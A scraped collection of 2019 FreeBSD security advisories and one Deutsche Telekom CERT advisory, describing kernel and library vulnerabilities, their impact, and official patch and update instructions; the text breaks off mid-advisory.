https://security.FreeBSD.org/advisories/FreeBSD-SA-19:17.fd.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WnBfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cIOTQ/+KQMGXwNiuMVNib5ErewD9QdT48NYaU/hYUub3VMAfQltvWmbiPw7zXj7 yJGm9FxWrMvZ6hFnKskV60u9d7PMYkOv4nzcaFgPoadByXXlALQGd
FreeBSD Security Advisory FreeBSD-SA-19:15.mqueuefs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:15.mqueuefs Security Advisory The FreeBSD Project Topic: Reference count overflow in mqueue filesystem Category: core Module: kernel Announced: 2019-07-24 Credits:Mateusz Guzik Affects:All supported versions of FreeBSD. Corrected: 2019-07-23 21:12:32 UTC (stable/12, 12.0-STABLE) 2019-07-24 12:55:16 UTC (releng/12.0, 12.0-RELEASE-p8) 2019-07-23 21:15:28 UTC (stable/11, 11.2-STABLE) 2019-07-24 12:55:16 UTC (releng/11.2, 11.2-RELEASE-p12) 2019-07-24 12:55:16 UTC (releng/11.3, 11.3-RELEASE-p1) CVE Name: CVE-2019-5603 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background mqueuefs(5) implements POSIX message queue file system which can be used by processes as a communication mechanism. 'struct file' represents open files, directories, sockets and other entities. II. Problem Description System calls operating on file descriptors obtain a reference to relevant struct file which due to a programming error was not always put back, which in turn could be used to overflow the counter of affected struct file. III. Impact A local user can use this flaw to obtain access to files, directories, sockets etc. opened by processes owned by other users. If obtained struct file represents a directory from outside of user's jail, it can be used to access files outside of the jail. If the user in question is a jailed root they can obtain root privileges on the host system. IV. Workaround No workaround is available. Note that the mqueuefs file system is not enabled by default. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:15/mqueuefs.patch # fetch https://security.FreeBSD.org/patches/SA-19:15/mqueuefs.patch.asc # gpg --verify mqueuefs.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r350261 releng/12.0/ r350284 stable/11/r350263 releng/11.2/ r350284 releng/11.3/ r350284 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5603> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:15.mqueuefs.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WmdfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cIWpBAAg9BmPamkj7wLJODR8SvNk+qYqEbYeakiSGnvXllz2l+qI2dhMVsuQRGQ ko7VY0P2Wuh68UiiDG63Oq3hbOWPPkL1axk6n275rZSdoVj856tjrHjnUtP3UX5S WQUKRAREjhVjM9dAOwCYrmAmcpX4SkslklhfiR6AR62t4eptMlfJ6ACQATs6FPnX WRdyDe7yq0mL4UHWg+PvotQ+rxGiynwgVRMXwaglKOldGOuPOeuj7azM4nb6/qkN GjJlJOIRwfU1/sXVI
FreeBSD Security Advisory FreeBSD-SA-19:14.freebsd32
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:14.freebsd32 Security Advisory The FreeBSD Project Topic: Kernel memory disclosure in freebsd32_ioctl Category: core Module: kernel Announced: 2019-07-24 Credits:Ilja van Sprundel, IOActive Affects:FreeBSD 11.2 and FreeBSD 11.3 Corrected: 2019-07-22 18:14:34 UTC (stable/11, 11.2-STABLE) 2019-07-24 12:54:10 UTC (releng/11.2, 11.2-RELEASE-p12) 2019-07-24 12:54:10 UTC (releng/11.3, 11.3-RELEASE-p1) CVE Name: CVE-2019-5605 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The FreeBSD kernel supports executing 32-bit applications on a 64-bit kernel, including the ioctl(2) interface. II. Problem Description Due to insufficient initialization of memory copied to userland in the components listed above small amounts of kernel memory may be disclosed to userland processes. III. Impact A user who can invoke 32-bit FreeBSD ioctls may be able to read the contents of small portions of kernel memory. Such memory might contain sensitive information, such as portions of the file cache or terminal buffers. This information might be directly useful, or it might be leveraged to obtain elevated privileges in some way; for example, a terminal buffer might include a user-entered password. IV. Workaround No workaround is available. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:14/freebsd32.patch # fetch https://security.FreeBSD.org/patches/SA-19:14/freebsd32.patch.asc # gpg --verify freebsd32.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/11/r350217 releng/11.2/ r350283 releng/11.3/ r350283 - - Note: This issue was addressed in a different way prior to the branch point for stable/12. As such, no patch is needed for FreeBSD 12.x. To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5605> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:14.freebsd32.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WmNfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cIavw//emdRXVNpGREW1FfUvWmUPpdgk6rFck9nEG0KUKYCcfhqN83BN9XtqaWu lBQ1jbB/CsalwL6Gpn2yuMvgS8W4yUidyPHLpzuoAThlsy5bHID1/oRftJt0T0BS kHbTD0tTUt3QDV51FoLBjvXfjRRb8xJ+wIGJ0NzOscWgjgu6JPUysHEJD3+vSOKN X3qJd3zcoYqswcvuhoVE2cFrSaZKEyIi1pJVr9CGItQTWXIisgdXdGYTnBdZU8jq iJGaI1BXiNUl/p/21JA32T+ZD7cdMtx6KiuoKlY7Bzgj7Qk3XW7xsQsYu724LIJT pVhIxntMrQSak7wIaqNPGR/FgkkKDsoo6iCHXlGxXv6tLg7pnioZIaHhc5+UZqmT 8I0UogWhQZS03/nwFRVDLPp+ka2P0g2gsm/dX1UVuucMT+hGeqn2c/iaSU76duoR qavRPjLPJDnfVrpXhpqco9rq1+UwA/1uSNe0cFX0ArX040hCReDsMphcxgrkZ0sD u71Px2ZLE5rpWmFd8LD0X2y1l4OEcTmoTPUtJxHlVrMFztuNbAlRny
FreeBSD Security Advisory FreeBSD-SA-19:12.telnet
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:12.telnet Security Advisory The FreeBSD Project Topic: telnet(1) client multiple vulnerabilities Category: contrib Module: contrib/telnet Announced: 2019-07-24 Credits:Juniper Networks Affects:All supported versions of FreeBSD. Corrected: 2019-07-19 15:37:29 UTC (stable/12, 12.0-STABLE) 2019-07-24 12:51:52 UTC (releng/12.0, 12.0-RELEASE-p8) 2019-07-19 15:27:53 UTC (stable/11, 11.2-STABLE) 2019-07-24 12:51:52 UTC (releng/11.2, 11.2-RELEASE-p12) 2019-07-24 12:51:52 UTC (releng/11.3, 11.3-RELEASE-p1) CVE Name: CVE-2019-0053 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The telnet(1) command is a TELNET protocol client, used primarily to establish terminal sessions across a network. II. Problem Description Insufficient validation of environment variables in the telnet client supplied in FreeBSD can lead to stack-based buffer overflows. A stack- based overflow is present in the handling of environment variables when connecting via the telnet client to remote telnet servers. This issue only affects the telnet client. Inbound telnet sessions to telnetd(8) are not affected by this issue. III. Impact These buffer overflows may be triggered when connecting to a malicious server, or by an active attacker in the network path between the client and server. Specially crafted TELNET command sequences may cause the execution of arbitrary code with the privileges of the user invoking telnet(1). IV. Workaround Do not use telnet(1) to connect to untrusted machines or over an untrusted network. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:12/telnet.patch # fetch https://security.FreeBSD.org/patches/SA-19:12/telnet.patch.asc # gpg --verify telnet.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r350139 releng/12.0/ r350281 stable/11/r350140 releng/11.2/ r350281 releng/11.3/ r350281 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0053> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:12.telnet.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WltfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cLOzA//YxRZNUr+d8B+t6DnBUbVvthJiY9sQ1YPXUIJmp4QA7wvXr5UjURw+6qv raxEp6JmF06wZK4RjeIFckQD6s2wnjO5VHO80Zbs0nD4NejQGeDAIlVdKqofOtJv bBQNSY3vPAtumyfElc+N19rKetAjGbsUjOMbn87GlWrit4lqcavBQsdmSlQB5gVA dFAFsVxr+ujjATnrCmIpFiaDk0unyJ7Gtz7jiM9I8xZueJtM49/9kNCFFLKCMUl8 HpB2k0cb18GVNJoKtzo1nELOM/oIJVO5HZt1fmYG/RgeL1BSyzg
FreeBSD Security Advisory FreeBSD-SA-19:13.pts
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:13.ptsSecurity Advisory The FreeBSD Project Topic: pts(4) write-after-free Category: core Module: kernel Announced: 2019-07-24 Credits:syzkaller Affects:All supported versions of FreeBSD. Corrected: 2019-07-07 14:19:46 UTC (stable/12, 12.0-STABLE) 2019-07-24 12:53:06 UTC (releng/12.0, 12.0-RELEASE-p8) 2019-07-07 14:20:14 UTC (stable/11, 11.2-STABLE) 2019-07-24 12:53:06 UTC (releng/11.2, 11.2-RELEASE-p12) 2019-07-24 12:53:06 UTC (releng/11.3, 11.3-RELEASE-p1) CVE Name: CVE-2019-5606 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The posix_openpt(2) system call allocates a pseudo-terminal device and returns a descriptor referencing that device. Such a descriptor may be configured such that a SIGIO signal will be sent to a designated process or process group when the device is ready to perform I/O. II. Problem Description The code which handles a close(2) of a descriptor created by posix_openpt(2) fails to undo the configuration which causes SIGIO to be raised. This bug can lead to a write-after-free of kernel memory. III. Impact The bug permits malicious code to trigger a write-after-free, which may be used to gain root privileges or escape a jail. IV. Workaround No workaround is available. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:13/pts.patch # fetch https://security.FreeBSD.org/patches/SA-19:13/pts.patch.asc # gpg --verify pts.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r349805 releng/12.0/ r350282 stable/11/r349806 releng/11.2/ r350282 releng/11.3/ r350282 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5606> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:13.pts.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04Wl9fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cLZDA//SGC+7Vghtofm/CzylIXhC1drFOxNYJOF7KEJqDwsRR3U9S99Q9NBWS5+ e+/vJzvV0+epZNQXDlit5a76jGwy4fNuutNh0J3APHe/l0Zp/PhM56IwRWQgqAkQ hF67xhHxFZs8AH6/bw21N4IkRrAZHmrrCY8ubZArjoUi0gCoFzAYRw1Nh/JTQoLS IGuqUFaMZWKvu3aeJiikLjHiJUMRAY7sxh+iSBSp99dsLkASqQZtx1grmosljttN fuD7qO2f067EWUpC50JTbNt9V7za854hrlOp8jn1g51O4fWWJoEEL2/0VUeOO+fr aGS9UNal25NPr2zGzx2t0u1VNE3/YKoZ0tq+mQYtaXke32ZO15Ufby0YcLU4DF8d dU1ZoG2AGbWmBqgQ982hocq5Dn0r5yCHXDeEGguE1DsfyBuUEZw6zfYRtzIQ0swk wDrdETxpIMa8jaSGtDw2bilrLNRIVqYkXBJftC3fpXhlz6PyU6bZaFm00xrs7z1D EJMkuIWho9oMqLTU7bZNHv7JD4G3ziTF1h2tGXGcEKp02ImNZQnw3w5PBberFgto H4uJQC
Deutsche Telekom CERT Advisory [DTC-A-20170323-001]
Deutsche Telekom CERT Advisory [DTC-A-20170323-001] Summary: Information leakage found in FRITZ!OS 6.83 & 6.80 (AVM DSL Router Fritz!Box 7490) Recommendation: Update to the newest Version of FRITZ!OS Details: a) application b) problem c) CVSS d) detailed description e) credits a) FRITZ!OS 6.83 & 6.80 (AVM DSL Router Fritz!Box 7490) b) Memory leakage within the PPPoE/PPP padding c) 4.7 CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N/RL:U d) Multiple DSL access router (aka Homegateway / CPE) handle PPPoE frame padding incorrectly. Instead of padding frames with zeroes, frames are padded with random memory, allowing an attacker (with physical access to wire between PPPoE endpoints) to view slices of previously transmitted packets or portions of kernel memory. This seems to be similar to http://www.securiteam.com/securitynews/5BP01208UO.html. AVM DSL Router Fritz!Box 7490 (tested with FRITZ!OS 6.83 & 6.80) sends portion of memory within PPPoE Discovery protocol PADT frames because arbitrary memory is used in the padding to reach the minimum Ethernet frame length. Further research shows that short PPP LCP frames are also padded with random memory. e) Christian Kagerhuber
FreeBSD Security Advisory FreeBSD-SA-19:10.ufs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:10.ufsSecurity Advisory The FreeBSD Project Topic: Kernel stack disclosure in UFS/FFS Category: core Module: Kernel Announced: 2019-07-02 Credits:David G. Lawrence Affects:All supported versions of FreeBSD. Corrected: 2019-05-10 23:45:16 UTC (stable/12, 12.0-STABLE) 2019-07-02 00:02:16 UTC (releng/12.0, 12.0-RELEASE-p7) 2019-05-10 23:46:42 UTC (stable/11, 11.2-STABLE) 2019-07-02 00:02:16 UTC (releng/11.2, 11.2-RELEASE-p11) CVE Name: CVE-2019-5601 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The Berkeley Fast File System (FFS) is an implementation of the UNIX File System (UFS) filesystem used by FreeBSD. II. Problem Description A bug causes up to three bytes of kernel stack memory to be written to disk as uninitialized directory entry padding. This data can be viewed by any user with read access to the directory. Additionally, a malicious user with write access to a directory can cause up to 254 bytes of kernel stack memory to be exposed. III. Impact Some amount of the kernel stack is disclosed and written out to the filesystem. IV. Workaround No workaround is available but systems not using UFS/FFS are not affected. V. Solution Special note: This update also adds the -z flag to fsck_ffs to have it scrub the leaked information in the name padding of existing directories. It only needs to be run once on each UFS/FFS filesystem after a patched kernel is installed and running. Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterwards, reboot the system and run: # fsck -t ufs -f -p -T ufs:-z to clean up your existing filesystems. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.x] # fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.12.patch # fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.12.patch.asc # gpg --verify ufs.12.patch.asc [FreeBSD 11.x] # fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.11.patch # fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.11.patch.asc # gpg --verify ufs.11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system and run: # fsck -t ufs -f -p -T ufs:-z to clean up your existing filesystems. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r347474 releng/12.0/ r349623 stable/11/r347475 releng/11.2/ r349623 - - Note: This patch was applied to the stable/11 branch before the branch point for releng/11.3. As such, no patch is needed for any 11.3-BETA or -RC. To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5601> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:10.ufs.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl0b9WVfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIAC
FreeBSD Security Advisory FreeBSD-SA-19:11.cd_ioctl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:11.cd_ioctl Security Advisory The FreeBSD Project Topic: Privilege escalation in cd(4) driver Category: core Module: kernel Announced: 2019-07-02 Credits:Alex Fortune Affects:All supported versions of FreeBSD. Corrected: 2019-07-03 00:11:31 UTC (stable/12, 12.0-STABLE) 2019-07-02 00:03:55 UTC (releng/12.0, 12.0-RELEASE-p7) 2019-07-03 00:12:50 UTC (stable/11, 11.3-PRERELEASE) 2019-07-02 00:03:55 UTC (releng/11.3, 11.3-RC3-p1) 2019-07-02 00:03:55 UTC (releng/11.2, 11.2-RELEASE-p11) CVE Name: CVE-2019-5602 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The cd(4) driver implements a number of ioctls to permit low-level access to the media in the CD-ROM device. The Linux emulation layer provides a corresponding set of ioctls, some of which are implemented as wrappers of native cd(4) ioctls. These ioctls are available to users in the operator group, which gets read-only access to cd(4) devices by default. II. Problem Description To implement one particular ioctl, the Linux emulation code used a special interface present in the cd(4) driver which allows it to copy subchannel information directly to a kernel address. This interface was erroneously made accessible to userland, allowing users with read access to a cd(4) device to arbitrarily overwrite kernel memory when some media is present in the device. III. Impact A user in the operator group can make use of this interface to gain root privileges on a system with a cd(4) device when some media is present in the device. IV. Workaround devfs.conf(5) and devfs.rules(5) can be used to remove read permissions from cd(4) devices. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterwards, reboot the system. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.x] # fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.12.patch # fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.12.patch.asc # gpg --verify cd_ioctl.12.patch.asc [FreeBSD 11.x] # fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.11.patch # fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.11.patch.asc # gpg --verify cd_ioctl.11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r349628 releng/12.0/ r349625 stable/11/r349629 releng/11.3/ r349625 releng/11.2/ r349625 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5602> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:11.cd_ioctl.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl0b9WtfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0
FreeBSD Security Advisory FreeBSD-SA-19:09.iconv
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:09.iconv Security Advisory The FreeBSD Project Topic: iconv buffer overflow Category: core Module: libc Announced: 2019-07-02 Credits:Andrea Venturoli , NetFence Affects:All supported versions of FreeBSD. Corrected: 2019-07-03 00:01:38 UTC (stable/12, 12.0-STABLE) 2019-07-03 00:00:39 UTC (releng/12.0, 12.0-RELEASE-p7) 2019-07-03 00:03:14 UTC (stable/11, 11.3-PRERELEASE) 2019-07-03 00:00:39 UTC (releng/11.3, 11.3-RC3-p1) 2019-07-03 00:00:39 UTC (releng/11.2, 11.2-RELEASE-p11) CVE Name: CVE-2019-5600 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The iconv(3) API converts text data from one character encoding to another and is available as part of the standard C library (libc). II. Problem Description With certain inputs, iconv may write beyond the end of the output buffer. III. Impact Depending on the way in which iconv is used, an attacker may be able to create a denial of service, provoke incorrect program behavior, or induce a remote code execution. iconv is a libc library function and the nature of possible attacks will depend on the way in which iconv is used by applications or daemons. IV. Workaround No workaround is available. Stack canaries (-fstack-protector), which are enabled by default, provide a degreee of defense against code injection but not against denial of service. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Restart any potentially affected daemons. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:09/iconv.patch # fetch https://security.FreeBSD.org/patches/SA-19:09/iconv.patch.asc # gpg --verify iconv.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart all daemons that use the library, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r349622 releng/12.0/ r349621 stable/11/r349624 releng/11.3/ r349621 releng/11.2/ r349621 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5600> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:09.iconv.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl0b9WBfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cK8qg//bXSYMJQUBC0POTT5zGXSAmXfKjxbCi4N67cfTrQkEvW672QX4Jw9smkK D3PwyQs8QWIwsXL69rRgKDFHhPplOmTkx1vaPrA3DckYliwNvLRV3I6G2bRnx3E3 DoAyDmBvFK5lJWa3WxbCpeJA69yZ/JbX1Yw6HsRLk74hGkfvlkruKkfxsNjXzaq4 0+d+ZYs/vRDmIW5/R/bYy1+iyDamyCMl2xXtlZBKrGe6lhj8Vi4/evJjipFtskc2 RnGKolNoZQc03pgX0QS2JZDb+ay23elkOCbhYPqGr1f++M95oOktX3epsJNSH++u pmJ72FNRsnZSVFxoX7o14eh4k6OGYIvGFSkXQ9VG1NV7PQO8VZAQk9gw264O/1Mi 2aW88e78GLallQO
FreeBSD Security Advisory FreeBSD-SA-19:08.rack
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:08.rack Security Advisory The FreeBSD Project Topic: Resource exhaustion in non-default RACK TCP stack Category: core Module: inet Announced: 2019-06-19 Credits:Jonathan Looney (Netflix) Peter Lei (Netflix) Affects:FreeBSD 12.0 and later Corrected: 2019-06-19 16:25:39 UTC (stable/12, 12.0-STABLE) 2019-06-19 16:43:05 UTC (releng/12.0, 12.0-RELEASE-p6) CVE Name: CVE-2019-5599 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The Transmission Control Protocol (TCP) of the TCP/IP protocol suite provides a connection-oriented, reliable, sequence-preserving data stream service. A TCP loss detection algorithm called RACK ("Recent ACKnowledgment") uses the notion of time, in addition to packet or sequence counts, to detect losses for modern TCP implementations that support per-packet timestamps and the selective acknowledgment (SACK) option. FreeBSD ships an optional implementation of RACK. Please note this is not included by default. If RACK was not specifically compiled, installed, and loaded, the system is not vulnerable. II. Problem Description While processing acknowledgements, the RACK code uses several linked lists to maintain state entries. A malicious attacker can 